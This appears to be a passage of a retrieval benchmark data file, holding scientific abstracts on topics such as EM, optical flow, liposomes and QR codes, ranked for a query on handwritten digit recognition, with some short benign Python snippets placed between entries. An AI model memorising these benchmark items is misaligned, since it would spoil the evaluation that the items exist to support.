"text": "These notes give a short introduction to Gaussian mixture models (GMMs) and the Expectation-Maximization (EM) algorithm, first for the specific case of GMMs, and then more generally. These notes assume you’re familiar with basic probability and basic calculus. If you’re interested in the full derivation (Section 3), some familiarity with entropy and KL divergence is useful but not strictly required. The notation here is borrowed from Introduction to Probability by Bertsekas & Tsitsiklis: random variables are represented with capital letters, values they take are represented with lowercase letters, pX represents a probability distribution for random variable X, and pX(x) represents the probability of value x (according to pX). We’ll also use the shorthand notation X 1 to represent the sequence X1, X2, . . . , Xn, and similarly x n 1 to represent x1, x2, . . . , xn. These notes follow a development somewhat similar to the one in Pattern Recognition and Machine Learning by Bishop.",
"title": ""
},
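The notes above outline how EM fits a Gaussian mixture. As an illustration only (the toy data, component count, and initialisation below are assumptions, not taken from the notes), here is a minimal NumPy sketch of the E- and M-steps for a one-dimensional GMM:

```python
# Minimal EM for a 1-D Gaussian mixture model (illustrative sketch).
import numpy as np

def em_gmm_1d(x, k=2, n_iter=50, seed=0):
    rng = np.random.default_rng(seed)
    n = len(x)
    # Initialise mixing weights, means and variances (assumed starting values).
    pi = np.full(k, 1.0 / k)
    mu = rng.choice(x, size=k, replace=False)
    var = np.full(k, np.var(x))
    for _ in range(n_iter):
        # E-step: responsibilities r[i, j] = p(component j | x_i).
        dens = np.exp(-0.5 * (x[:, None] - mu) ** 2 / var) / np.sqrt(2 * np.pi * var)
        r = pi * dens
        r /= r.sum(axis=1, keepdims=True)
        # M-step: re-estimate parameters from the soft assignments.
        nk = r.sum(axis=0)
        pi = nk / n
        mu = (r * x[:, None]).sum(axis=0) / nk
        var = (r * (x[:, None] - mu) ** 2).sum(axis=0) / nk
    return pi, mu, var

# Toy usage on synthetic data drawn from two Gaussians.
x = np.concatenate([np.random.normal(-2, 1, 300), np.random.normal(3, 0.5, 200)])
print(em_gmm_1d(x, k=2))
```

Each iteration first computes soft responsibilities (E-step) and then re-estimates the mixing weights, means, and variances from them (M-step), which is the alternation the notes derive.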
{
"docid": "f4b424ae1defc67fb660e2fa300177eb",
"text": "The annual Satisfiability Modulo Theories Competition (SMT-COMP) was initiated in 2005 in order to stimulate the advance of state-of-the-art techniques and tools developed by the Satisfiability Modulo Theories (SMT) community. This paper summarizes the first six editions of the competition. We present the evolution of the competition’s organization and rules, show how the state of the art has improved over the course of the competition, and discuss the impact SMT-COMP has had on the SMT community and beyond. Additionally, we include an exhaustive list of all competitors, and present experimental results showing significant improvement in SMT solvers during these six years. Finally, we analyze to what extent the initial goals of the competition have been achieved, and sketch future directions for the competition.",
"title": ""
},
{
"docid": "a81b999f495637ba3e12799d727d872d",
"text": "The inversion of remote sensing images is crucial for soil moisture mapping in precision agriculture. However, the large size of remote sensing images complicates their management. Therefore, this study proposes a remote sensing observation sharing method based on cloud computing (ROSCC) to enhance remote sensing observation storage, processing, and service capability. The ROSCC framework consists of a cloud computing-enabled sensor observation service, web processing service tier, and a distributed database tier. Using MongoDB as the distributed database and Apache Hadoop as the cloud computing service, this study achieves a high-throughput method for remote sensing observation storage and distribution. The map, reduced algorithms and the table structure design in distributed databases are then explained. Along the Yangtze River, the longest river in China, Hubei Province was selected as the study area to test the proposed framework. Using GF-1 as a data source, an experiment was performed to enhance earth observation data (EOD) storage and achieve large-scale soil moisture mapping. The proposed ROSCC can be applied to enhance EOD sharing in cloud computing context, so as to achieve soil moisture mapping via the modified perpendicular drought index in an efficient way to better serve precision agriculture.",
"title": ""
},
{
"docid": "937644ac8b97de476653e4b8aaa924ac",
"text": "In this paper, a generalized discontinuous pulsewidth modulation (GDPWM) method with superior high modulation operating range performance characteristics is developed. An algorithm which employs the conventional space-vector PWM method in the low modulation range, and the GDPWM method in the high modulation range, is established. As a result, the current waveform quality, switching losses, voltage linearity range, and the overmodulation region performance of a PWM voltage-source inverter (PWM-VSI) drive are on-line optimized, as opposed to conventional modulators with fixed characteristics. Due to its compactness, simplicity, and superior performance, the algorithm is suitable for most high-performance PWM-VSI drive applications. This paper provides detailed performance analysis of the method and compares it to the other methods. The experimental results verify the superiority of this algorithm to the conventional PWM methods.",
"title": ""
},
{
"docid": "c049c79253bd9575774c60b459af4505",
"text": "Ginkgo has been a mainstay of traditional Chinese medicine for more than 5000 years. Perhaps the ancient Taoist Monks had some vision of the future of Ginkgo as a brain and memory tonic when they planted it ceremonially in places of honor in their monasteries. They felt that this two lobed, fan-shaped leaf (biloba) represented the two phases of Yin and Yang in Taoist Philosophy. Ginkgo was planted to portray wisdom, centeredness and a meditative state.",
"title": ""
},
{
"docid": "6f609fef5fd93e776fd7d43ed91fd4a8",
"text": "Wandering is among the most frequent, problematic, and dangerous behaviors for elders with dementia. Frequent wanderers likely suffer falls and fractures, which affect the safety and quality of their lives. In order to monitor outdoor wandering of elderly people with dementia, this paper proposes a real-time method for wandering detection based on individuals' GPS traces. By representing wandering traces as loops, the problem of wandering detection is transformed into detecting loops in elders' mobility trajectories. Specifically, the raw GPS data is first preprocessed to remove noisy and crowded points by performing an online mean shift clustering. A novel method called θ_WD is then presented that is able to detect loop-like traces on the fly. The experimental results on the GPS datasets of several elders have show that the θ_WD method is effective and efficient in detecting wandering behaviors, in terms of detection performance (AUC > 0.99, and 90% detection rate with less than 5 % of the false alarm rate), as well as time complexity.",
"title": ""
},
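The abstract represents wandering as loop-like GPS traces. The sketch below shows one simple way to flag such loops: a trace that returns close to an earlier point after covering a substantial path length. The distance thresholds and the haversine-based criterion are illustrative assumptions, not the published θ_WD algorithm.

```python
# Illustrative loop detector for a GPS trace (not the published theta_WD algorithm).
import math

def haversine_m(p, q):
    """Great-circle distance in metres between two (lat, lon) points."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*p, *q))
    a = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371000 * math.asin(math.sqrt(a))

def has_loop(trace, close_m=25.0, min_path_m=150.0):
    """Flag a loop when the trace returns near an earlier point after a long detour.

    close_m and min_path_m are assumed thresholds; the paper tunes its own criterion.
    """
    # Cumulative path length up to each point.
    cum = [0.0]
    for a, b in zip(trace, trace[1:]):
        cum.append(cum[-1] + haversine_m(a, b))
    for j in range(len(trace)):
        for i in range(j):
            if cum[j] - cum[i] >= min_path_m and haversine_m(trace[i], trace[j]) <= close_m:
                return True
    return False
```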
{
"docid": "df6c7f13814178d7b34703757899d6b1",
"text": "Regression testing of natural language systems is problematic for two main reasons: component input and output is complex, and system behaviour is context-dependent. We have developed a generic approach which solves both of these issues. We describe our regression tool, CONTEST, which supports context-dependent testing of dialogue system components, and discuss the regression test sets we developed, designed to effectively isolate components from changes and problems earlier in the pipeline. We believe that the same approach can be used in regression testing for other dialogue systems, as well as in testing any complex NLP system containing multiple components.",
"title": ""
},
{
"docid": "ce56d594c7ee2a935b2b8b243d892070",
"text": "We introduce a skill discovery method for reinforcement learning in continuous domains that constructs chains of skills leading to an end-of-task reward. We demonstrate experimentally that it creates appropriate skills and achieves performance benefits in a challenging continuous domain.",
"title": ""
},
{
"docid": "902e6d047605a426ae9bebc3f9ddf139",
"text": "Learning based approaches have not yet achieved their full potential in optical flow estimation, where their performance still trails heuristic approaches. In this paper, we present a CNN based patch matching approach for optical flow estimation. An important contribution of our approach is a novel thresholded loss for Siamese networks. We demonstrate that our loss performs clearly better than existing losses. It also allows to speed up training by a factor of 2 in our tests. Furthermore, we present a novel way for calculating CNN based features for different image scales, which performs better than existing methods. We also discuss new ways of evaluating the robustness of trained features for the application of patch matching for optical flow. An interesting discovery in our paper is that low-pass filtering of feature maps can increase the robustness of features created by CNNs. We proved the competitive performance of our approach by submitting it to the KITTI 2012, KITTI 2015 and MPI-Sintel evaluation portals where we obtained state-of-the-art results on all three datasets.",
"title": ""
},
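The abstract credits much of the gain to a novel thresholded loss for Siamese networks but does not spell it out here. The snippet below sketches one plausible reading, a hinge-style loss that stops penalising pairs once they are already well separated; the exact thresholds and functional form used in the paper may differ.

```python
# Generic thresholded hinge loss for Siamese patch descriptors (assumed form,
# not necessarily the exact loss proposed in the paper).
import numpy as np

def thresholded_hinge_loss(d_pos, d_neg, t_pos=0.3, t_neg=1.0):
    """d_pos: distances of matching pairs, d_neg: distances of non-matching pairs.

    Matching pairs are only penalised once their distance exceeds t_pos, and
    non-matching pairs once their distance falls below t_neg, so already
    well-separated pairs contribute zero gradient.
    """
    pos_term = np.maximum(0.0, d_pos - t_pos)
    neg_term = np.maximum(0.0, t_neg - d_neg)
    return pos_term.mean() + neg_term.mean()
```

Because saturated pairs contribute zero gradient, training is driven by the informative pairs, which is one way such a loss can speed up training.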
{
"docid": "ae2e62bd0e51299661822a85bd690cd1",
"text": "Today medical services have come a long way to treat patients with various diseases. Among the most lethal one is the heart disease problem which cannot be seen with a naked eye and comes instantly when its limitations are reached. Today diagnosing patients correctly and administering effective treatments have become quite a challenge. Poor clinical decisions may end to patient death and which cannot be afforded by the hospital as it loses its reputation. The cost to treat a patient with a heart problem is quite high and not affordable by every patient. To achieve a correct and cost effective treatment computer-based information and/or decision support Systems can be developed to do the task. Most hospitals today use some sort of hospital information systems to manage their healthcare or patient data. These systems typically generate huge amounts of data which take the form of numbers, text, charts and images. Unfortunately, these data are rarely used to support clinical decision making. There is a wealth of hidden information in these data that is largely untapped. This raises an important question: \" How can we turn data into useful information that can enable healthcare practitioners to make intelligent clinical decisions? \" So there is need of developing a master's project which will help practitioners predict the heart disease before it occurs.The diagnosis of diseases is a vital and intricate job in medicine. The recognition of heart disease from diverse features or signs is a multi-layered problem that is not free from false assumptions and is frequently accompanied by impulsive effects. Thus the attempt to exploit knowledge and experience of several specialists and clinical screening data of patients composed in databases to assist the diagnosis procedure is regarded as a valuable option.",
"title": ""
},
{
"docid": "29b0d0737493b50cbcec8c4cecc76f5b",
"text": "The author first provides an overview of computational intelligence and AI in games. Then he describes the new IEEE Transactions, which will publish archival quality original papers in all aspects of computational intelligence and AI related to all types of games. To name some examples, these include computer and video games, board games, card games, mathematical games, games that model economies or societies, serious games with educational and training applications, and games involving physical objects such as robot football and robotic car racing. Emphasis will also be placed on the use of these methods to improve performance in, and understanding of, the dynamics of games, as well as gaining insight into the properties of the methods as applied to games. It will also include using games as a platform for building intelligent embedded agents for real-world applications. The journal builds on a scientific community that has already been active in recent years with the development of new conference series such as the IEEE Symposium on Computational Intelligence in Games (CIG) and Artificial Intelligence and Interactive Digital Entertainment (AIIDE), as well as special issues on games in journals such as the IEEE Transactions on Evolutionary Computation. When setting up the journal, a decision was made to include both artificial intelligence (AI) and computational intelligence (CI) in the title. AI seeks to simulate intelligent behavior in any way that can be programmed effectively. Some see the field of AI as being all-inclusive, while others argue that there is nothing artificial about real intelligence as exhibited by higher mammals.",
"title": ""
},
{
"docid": "9d5ca4c756b63c60f6a9d6308df63ea3",
"text": "This paper presents recent advances in the project: development of a convertible unmanned aerial vehicle (UAV). This aircraft is able to change its flight configuration from hover to level flight and vice versa by means of a transition maneuver, while maintaining the aircraft in flight. For this purpose a nonlinear control strategy based on Lyapunov design is given. Numerical results are presented showing the effectiveness of the proposed approach.",
"title": ""
}
] | scidocsrr |
b946bcca0178da0ccae0e2a586f1c7c7 | Handwritten digit recognition using biologically inspired features | [
{
"docid": "be369e7935f5a56b0c5ac671c7ec315b",
"text": "Memory-based classification algorithms such as radial basis functions or K-nearest neighbors typically rely on simple distances (Euclidean, dot product ... ), which are not particularly meaningful on pattern vectors. More complex, better suited distance measures are often expensive and rather ad-hoc (elastic matching, deformable templates). We propose a new distance measure which (a) can be made locally invariant to any set of transformations of the input and (b) can be computed efficiently. We tested the method on large handwritten character databases provided by the Post Office and the NIST. Using invariances with respect to translation, rotation, scaling, shearing and line thickness, the method consistently outperformed all other systems tested on the same databases.",
"title": ""
},
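The passage describes a distance that is locally invariant to a chosen set of transformations. The following sketch computes a one-sided tangent distance by projecting onto the tangent subspace at one pattern; the full method also uses the tangent plane of the second pattern, and the tangent vectors themselves would come from finite differences under small translations, rotations, scalings, and so on (assumed inputs here).

```python
# One-sided tangent distance between two pattern vectors (illustrative sketch).
import numpy as np

def tangent_distance(x, y, tangents):
    """Distance from y to the affine subspace {x + T a} spanned by the tangent
    vectors of the chosen transformations (translation, rotation, ...) at x.

    tangents is a (d, k) matrix whose columns approximate d(pattern)/d(transform).
    """
    x = np.asarray(x, dtype=float)
    y = np.asarray(y, dtype=float)
    T = np.asarray(tangents, dtype=float)
    # Least-squares coefficients of the best small transformation of x towards y.
    a, *_ = np.linalg.lstsq(T, y - x, rcond=None)
    residual = y - x - T @ a
    return float(np.linalg.norm(residual))
```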
{
"docid": "2ce4e4d5026114739adfeee7626e2aae",
"text": "-A neural network model for visual pattern recognition, called the \"neocognitron, \"' was previously proposed by the author In this paper, we discuss the mechanism of the model in detail. In order to demonstrate the ability of the neocognitron, we also discuss a pattern-recognition system which works with the mechanism of the neocognitron. The system has been implemented on a minicomputer and has been trained to recognize handwritten numerals. The neocognitron is a hierarchical network consisting of many layers of cells, and has variable connections between the cells in adjoining layers. It can acquire the ability to recognize patterns by learning, and can be trained to recognize any set of patterns. After finishing the process of learning, pattern recognition is performed on the basis of similarity in shape between patterns, and is not affected by deformation, nor by changes in size, nor by shifts in the position of the input patterns. In the hierarchical network of the neocognitron, local features of the input pattern are extracted by the cells of a lower stage, and they are gradually integrated into more global features. Finally, each cell of the highest stage integrates all the information of the input pattern, and responds only to one specific pattern. Thus, the response of the cells of the highest stage shows the final result of the pattern-recognition of the network. During this process of extracting and integrating features, errors in the relative position of local features are gradually tolerated. The operation of tolerating positional error a little at a time at each stage, rather than all in one step, plays an important role in endowing the network with an ability to recognize even distorted patterns.",
"title": ""
}
] | [
{
"docid": "3028de6940fb7a5af5320c506946edfc",
"text": "Metaphor is ubiquitous in text, even in highly technical text. Correct inference about textual entailment requires computers to distinguish the literal and metaphorical senses of a word. Past work has treated this problem as a classical word sense disambiguation task. In this paper, we take a new approach, based on research in cognitive linguistics that views metaphor as a method for transferring knowledge from a familiar, well-understood, or concrete domain to an unfamiliar, less understood, or more abstract domain. This view leads to the hypothesis that metaphorical word usage is correlated with the degree of abstractness of the word’s context. We introduce an algorithm that uses this hypothesis to classify a word sense in a given context as either literal (denotative) or metaphorical (connotative). We evaluate this algorithm with a set of adjectivenoun phrases (e.g., in dark comedy , the adjective dark is used metaphorically; in dark hair, it is used literally) and with the TroFi (Trope Finder) Example Base of literal and nonliteral usage for fifty verbs. We achieve state-of-theart performance on both datasets.",
"title": ""
},
{
"docid": "495143978d38979b64c3556a77740979",
"text": "We address the practical problems of estimating the information relations that characterize large networks. Building on methods developed for analysis of the neural code, we show that reliable estimates of mutual information can be obtained with manageable computational effort. The same methods allow estimation of higher order, multi–information terms. These ideas are illustrated by analyses of gene expression, financial markets, and consumer preferences. In each case, information theoretic measures correlate with independent, intuitive measures of the underlying structures in the system.",
"title": ""
},
{
"docid": "55a37995369fe4f8ddb446d83ac0cecf",
"text": "With the continued proliferation of smart mobile devices, Quick Response (QR) code has become one of the most-used types of two-dimensional code in the world. Aiming at beautifying the visual-unpleasant appearance of QR codes, existing works have developed a series of techniques. However, these works still leave much to be desired, such as personalization, artistry, and robustness. To address these issues, in this paper, we propose a novel type of aesthetic QR codes, SEE (Stylize aEsthEtic) QR code, and a three-stage approach to automatically produce such robust style-oriented codes. Specifically, in the first stage, we propose a method to generate an optimized baseline aesthetic QR code, which reduces the visual contrast between the noise-like black/white modules and the blended image. In the second stage, to obtain art style QR code, we tailor an appropriate neural style transformation network to endow the baseline aesthetic QR code with artistic elements. In the third stage, we design an error-correction mechanism by balancing two competing terms, visual quality and readability, to ensure the performance robust. Extensive experiments demonstrate that SEE QR code has high quality in terms of both visual appearance and robustness, and also offers a greater variety of personalized choices to users.",
"title": ""
},
{
"docid": "197ad51ef4b33978903a2ece4a64c350",
"text": "It has been suggested that Brain-Computer Interfaces (BCI) may one day be suitable for controlling a neuroprosthesis. For closed-loop operation of BCI, a tactile feedback channel that is compatible with neuroprosthetic applications is desired. Operation of an EEG-based BCI using only vibrotactile feedback, a commonly used method to convey haptic senses of contact and pressure, is demonstrated with a high level of accuracy. A Mu-rhythm based BCI using a motor imagery paradigm was used to control the position of a virtual cursor. The cursor position was shown visually as well as transmitted haptically by modulating the intensity of a vibrotactile stimulus to the upper limb. A total of six subjects operated the BCI in a two-stage targeting task, receiving only vibrotactile biofeedback of performance. The location of the vibration was also systematically varied between the left and right arms to investigate location-dependent effects on performance. Subjects are able to control the BCI using only vibrotactile feedback with an average accuracy of 56% and as high as 72%. These accuracies are significantly higher than the 15% predicted by random chance if the subject had no voluntary control of their Mu-rhythm. The results of this study demonstrate that vibrotactile feedback is an effective biofeedback modality to operate a BCI using motor imagery. In addition, the study shows that placement of the vibrotactile stimulation on the biceps ipsilateral or contralateral to the motor imagery introduces a significant bias in the BCI accuracy. This bias is consistent with a drop in performance generated by stimulation of the contralateral limb. Users demonstrated the capability to overcome this bias with training.",
"title": ""
},
{
"docid": "cc8e52fdb69a9c9f3111287905f02bfc",
"text": "We present a new methodology for exploring and analyzing navigation patterns on a web site. The patterns that can be analyzed consist of sequences of URL categories traversed by users. In our approach, we first partition site users into clusters such that users with similar navigation paths through the site are placed into the same cluster. Then, for each cluster, we display these paths for users within that cluster. The clustering approach we employ is model-based (as opposed to distance-based) and partitions users according to the order in which they request web pages. In particular, we cluster users by learning a mixture of first-order Markov models using the Expectation-Maximization algorithm. The runtime of our algorithm scales linearly with the number of clusters and with the size of the data; and our implementation easily handles hundreds of thousands of user sessions in memory. In the paper, we describe the details of our method and a visualization tool based on it called WebCANVAS. We illustrate the use of our approach on user-traffic data from msnbc.com.",
"title": ""
},
{
"docid": "e48e208c01fb6f8918aec8aa68e2ad86",
"text": "We propose a camera-based assistive text reading framework to help blind persons read text labels and product packaging from hand-held objects in their daily lives. To isolate the object from cluttered backgrounds or other surrounding objects in the camera view, we first propose an efficient and effective motion-based method to define a region of interest (ROI) in the video by asking the user to shake the object. This method extracts moving object region by a mixture-of-Gaussians-based background subtraction method. In the extracted ROI, text localization and recognition are conducted to acquire text information. To automatically localize the text regions from the object ROI, we propose a novel text localization algorithm by learning gradient features of stroke orientations and distributions of edge pixels in an Adaboost model. Text characters in the localized text regions are then binarized and recognized by off-the-shelf optical character recognition software. The recognized text codes are output to blind users in speech. Performance of the proposed text localization algorithm is quantitatively evaluated on ICDAR-2003 and ICDAR-2011 Robust Reading Datasets. Experimental results demonstrate that our algorithm achieves the state of the arts. The proof-of-concept prototype is also evaluated on a dataset collected using ten blind persons to evaluate the effectiveness of the system's hardware. We explore user interface issues and assess robustness of the algorithm in extracting and reading text from different objects with complex backgrounds.",
"title": ""
},
{
"docid": "9f32b1e95e163c96ebccb2596a2edb8d",
"text": "This paper is devoted to the control of a cable driven redundant parallel manipulator, which is a challenging problem due the optimal resolution of its inherent redundancy. Additionally to complicated forward kinematics, having a wide workspace makes it difficult to directly measure the pose of the end-effector. The goal of the controller is trajectory tracking in a large and singular free workspace, and to guarantee that the cables are always under tension. A control topology is proposed in this paper which is capable to fulfill the stringent positioning requirements for these type of manipulators. Closed-loop performance of various control topologies are compared by simulation of the closed-loop dynamics of the KNTU CDRPM, while the equations of parallel manipulator dynamics are implicit in structure and only special integration routines can be used for their integration. It is shown that the proposed joint space controller is capable to satisfy the required tracking performance, despite the inherent limitation of task space pose measurement.",
"title": ""
},
{
"docid": "ba5a2c1e189d412568fb768c90e9f04e",
"text": "As robots become more ubiquitous, it is increasingly important for untrained users to be able to interact with them intuitively. In this work, we investigate how people refer to objects in the world during relatively unstructured communication with robots. We collect a corpus of deictic interactions from users describing objects, which we use to train language and gesture models that allow our robot to determine what objects are being indicated. We introduce a temporal extension to stateof-the-art hierarchical matching pursuit features to support gesture understanding, and demonstrate that combining multiple communication modalities more effectively capture user intent than relying on a single type of input. Finally, we present initial interactions with a robot that uses the learned models to follow commands.",
"title": ""
},
{
"docid": "24fb623bb06a0df123aecd1c03e6a0e9",
"text": "Information technology (IT) projects are susceptible to changes in the business environment, and the increasing velocity of change in global business is challenging the management of enterprise systems such as enterprise resource planning (ERP). At the same time, system success depends on the rigor of the project management processes. scope creep, poor risk management, inadequate allocation of human resources over time, and vendor management are some common problems associated with the implementation of an enterprise system. These issues pose threats to the success of a large-scale software project such as ERP. This research adopts a case study approach to examine how poor project management can imperil the implementation of an ERP system. Having learned the lessons from the failure of its first ERP implementation, the company in this case reengineered its project management practices to successfully carry out its second ERP implementation. Many critical project management factors contributed to the failure and success of this company's ERP system. This study explores and identifies critical elements of project management that contributed to the success of the second ERP implementation. For those organizations adopting ERP, the findings provide a roadmap to follow in order to avoid making critical, but often underestimated, project management mistakes.",
"title": ""
},
{
"docid": "81c90998c5e456be34617e702dbfa4f5",
"text": "In this paper, a new unsupervised learning algorithm, namely Nonnegative Discriminative Feature Selection (NDFS), is proposed. To exploit the discriminative information in unsupervised scenarios, we perform spectral clustering to learn the cluster labels of the input samples, during which the feature selection is performed simultaneously. The joint learning of the cluster labels and feature selection matrix enables NDFS to select the most discriminative features. To learn more accurate cluster labels, a nonnegative constraint is explicitly imposed to the class indicators. To reduce the redundant or even noisy features, `2,1-norm minimization constraint is added into the objective function, which guarantees the feature selection matrix sparse in rows. Our algorithm exploits the discriminative information and feature correlation simultaneously to select a better feature subset. A simple yet efficient iterative algorithm is designed to optimize the proposed objective function. Experimental results on different real world datasets demonstrate the encouraging performance of our algorithm over the state-of-the-arts. Introduction The dimension of data is often very high in many domains (Jain and Zongker 1997; Guyon and Elisseeff 2003), such as image and video understanding (Wang et al. 2009a; 2009b), and bio-informatics. In practice, not all the features are important and discriminative, since most of them are often correlated or redundant to each other, and sometimes noisy (Duda, Hart, and Stork 2001; Liu, Wu, and Zhang 2011). These features may result in adverse effects in some learning tasks, such as over-fitting, low efficiency and poor performance (Liu, Wu, and Zhang 2011). Consequently, it is necessary to reduce dimensionality, which can be achieved by feature selection or transformation to a low dimensional space. In this paper, we focus on feature selection, which is to choose discriminative features by eliminating the ones with little or no predictive information based on certain criteria. Many feature selection algorithms have been proposed, which can be classified into three main families: filter, wrapper, and embedded methods. The filter methods (Duda, Hart, Copyright c © 2012, Association for the Advancement of Artificial Intelligence (www.aaai.org). All rights reserved. and Stork 2001; He, Cai, and Niyogi 2005; Zhao and Liu 2007; Masaeli, Fung, and Dy 2010; Liu, Wu, and Zhang 2011; Yang et al. 2011a) use statistical properties of the features to filter out poorly informative ones. They are usually performed before applying classification algorithms. They select a subset of features only based on the intrinsic properties of the data. In the wrapper approaches (Guyon and Elisseeff 2003; Rakotomamonjy 2003), feature selection is “wrapped” in a learning algorithm and the classification performance of features is taken as the evaluation criterion. Embedded methods (Vapnik 1998; Zhu et al. 2003) perform feature selection in the process of model construction. In contrast with filter methods, wrapper and embedded methods are tightly coupled with in-built classifiers, which causes that they are less generality and computationally expensive. In this paper, we focus on the filter feature selection algorithm. Because of the importance of discriminative information in data analysis, it is beneficial to exploit discriminative information for feature selection, which is usually encoded in labels. 
However, how to select discriminative features in unsupervised scenarios is a significant but hard task due to the lack of labels. In light of this, we propose a novel unsupervised feature selection algorithm, namely Nonnegative Discriminative Feature Selection (NDFS), in this paper. We perform spectral clustering and feature selection simultaneously to select the discriminative features for unsupervised learning. The cluster label indicators are obtained by spectral clustering to guide the feature selection procedure. Different from most of the previous spectral clustering algorithms (Shi and Malik 2000; Yu and Shi 2003), we explicitly impose a nonnegative constraint into the objective function, which is natural and reasonable as discussed later in this paper. With nonnegative and orthogonality constraints, the learned cluster indicators are much closer to the ideal results and can be readily utilized to obtain cluster labels. Our method exploits the discriminative information and feature correlation in a joint framework. For the sake of feature selection, the feature selection matrix is constrained to be sparse in rows, which is formulated as `2,1-norm minimization term. To solve the proposed problem, a simple yet effective iterative algorithm is proposed. Extensive experiments are conducted on different datasets, which show that the proposed approach outperforms the state-of-the-arts in different applications. Proceedings of the Twenty-Sixth AAAI Conference on Artificial Intelligence",
"title": ""
},
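The abstract describes a joint objective with an orthogonal, nonnegative cluster indicator and a row-sparse feature selection matrix. A formulation consistent with that description (with F the cluster indicator, W the selection matrix, X the data, L a graph Laplacian, and α, β trade-off weights; the exact weighting should be checked against the original paper) can be written as:

```latex
\min_{F,\,W} \ \operatorname{Tr}\!\left(F^{\top} L F\right)
  + \alpha \left( \left\lVert X^{\top} W - F \right\rVert_F^{2}
  + \beta \left\lVert W \right\rVert_{2,1} \right)
\quad \text{s.t.} \quad F^{\top} F = I, \; F \ge 0,
```

where the ℓ2,1 norm sums the Euclidean norms of the rows of W, driving whole rows (features) to zero.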
{
"docid": "7b4d904c2a0d237614e9367df69550b3",
"text": "Microgrids are a new concept for future energy distribution systems that enable renewable energy integration and improved energy management capability. Microgrids consist of multiple distributed generators (DGs) that are usually integrated via power electronic inverters. In order to enhance power quality and power distribution reliability, microgrids need to operate in both grid-connected and island modes. Consequently, microgrids can suffer performance degradation as the operating conditions vary due to abrupt mode changes and variations in bus voltages and system frequency. This paper presents controller design and optimization methods to stably coordinate multiple inverter-interfaced DGs and to robustly control individual interface inverters against voltage and frequency disturbances. Droop-control concepts are used as system-level multiple DG coordination controllers, and control theory is applied to device-level inverter controllers. Optimal control parameters are obtained by particle-swarm-optimization algorithms, and the control performance is verified via simulation studies.",
"title": ""
},
{
"docid": "63cf9ef326bbe39aa1ecc86b6b1cb0ce",
"text": "Drug delivery systems (DDS) have become important tools for the specific delivery of a large number of drug molecules. Since their discovery in the 1960s liposomes were recognized as models to study biological membranes and as versatile DDS of both hydrophilic and lipophilic molecules. Liposomes--nanosized unilamellar phospholipid bilayer vesicles--undoubtedly represent the most extensively studied and advanced drug delivery vehicles. After a long period of research and development efforts, liposome-formulated drugs have now entered the clinics to treat cancer and systemic or local fungal infections, mainly because they are biologically inert and biocompatible and practically do not cause unwanted toxic or antigenic reactions. A novel, up-coming and promising therapy approach for the treatment of solid tumors is the depletion of macrophages, particularly tumor associated macrophages with bisphosphonate-containing liposomes. In the advent of the use of genetic material as therapeutic molecules the development of delivery systems to target such novel drug molecules to cells or to target organs becomes increasingly important. Liposomes, in particular lipid-DNA complexes termed lipoplexes, compete successfully with viral gene transfection systems in this field of application. Future DDS will mostly be based on protein, peptide and DNA therapeutics and their next generation analogs and derivatives. Due to their versatility and vast body of known properties liposome-based formulations will continue to occupy a leading role among the large selection of emerging DDS.",
"title": ""
},
{
"docid": "03c03dcdc15028417e699649291a2317",
"text": "The unique characteristics of origami to realize 3-D shape from 2-D patterns have been fascinating many researchers and engineers. This paper presents a fabrication of origami patterned fabric wheels that can deform and change the radius of the wheels. PVC segments are enclosed in the fabrics to build a tough and foldable structure. A special cable driven mechanism was designed to allow the wheels to deform while rotating. A mobile robot with two origami wheels has been built and tested to show that it can deform its wheels to overcome various obstacles.",
"title": ""
},
{
"docid": "6e17362c0e6a4d3190b3c8b0a11d6844",
"text": "A transimpedance amplifier (TIA) has been designed in a 0.35 μm digital CMOS technology for Gigabit Ethernet. It is based on the structure proposed by Mengxiong Li [1]. This paper presents an amplifier which exploits the regulated cascode (RGC) configuration as the input stage with an integrated optical receiver which consists of an integrated photodetector, thus achieving as large effective input transconductance as that of Si Bipolar or GaAs MESFET. The RGC input configuration isolates the input parasitic capacitance including photodiode capacitance from the bandwidth determination better than common-gate TIA. A series inductive peaking is used for enhancing the bandwidth. The proposed TIA has transimpedance gain of 51.56 dBΩ, and 3-dB bandwidth of 6.57 GHz with two inductor between the RGC and source follower for 0.1 pF photodiode capacitance. The proposed TIA has an input courant noise level of about 21.57 pA/Hz0.5 and it consumes DC power of 16 mW from 3.3 V supply voltage.",
"title": ""
},
{
"docid": "2f3a7d341b32adc14985d5e66c42949e",
"text": "To increase efficacy in traditional classroom courses as well as in Massive Open Online Courses (MOOCs), automated systems supporting the instructor are needed. One important problem is to automatically detect students that are going to do poorly in a course early enough to be able to take remedial actions. This paper proposes an algorithm that predicts the final grade of each student in a class. It issues a prediction for each student individually, when the expected accuracy of the prediction is sufficient. The algorithm learns online what is the optimal prediction and time to issue a prediction based on past history of students' performance in a course. We derive demonstrate the performance of our algorithm on a dataset obtained based on the performance of approximately 700 undergraduate students who have taken an introductory digital signal processing over the past 7 years. Using data obtained from a pilot course, our methodology suggests that it is effective to perform early in-class assessments such as quizzes, which result in timely performance prediction for each student, thereby enabling timely interventions by the instructor (at the student or class level) when necessary.",
"title": ""
},
{
"docid": "5d80bf63f19f3aa271c0d16e179c90d6",
"text": "3D meshes are deployed in a wide range of application processes (e.g., transmission, compression, simplification, watermarking and so on) which inevitably introduce geometric distortions that may alter the visual quality of the rendered data. Hence, efficient model-based perceptual metrics, operating on the geometry of the meshes being compared, have been recently introduced to control and predict these visual artifacts. However, since the 3D models are ultimately visualized on 2D screens, it seems legitimate to use images of the models (i.e., snapshots from different viewpoints) to evaluate their visual fidelity. In this work we investigate the use of image metrics to assess the visual quality of 3D models. For this goal, we conduct a wide-ranging study involving several 2D metrics, rendering algorithms, lighting conditions and pooling algorithms, as well as several mean opinion score databases. The collected data allow (1) to determine the best set of parameters to use for this image-based quality assessment approach and (2) to compare this approach to the best performing model-based metrics and determine for which use-case they are respectively adapted. We conclude by exploring several applications that illustrate the benefits of image-based quality assessment.",
"title": ""
},
{
"docid": "f3e9858900dd75c86d106856e63f1ab2",
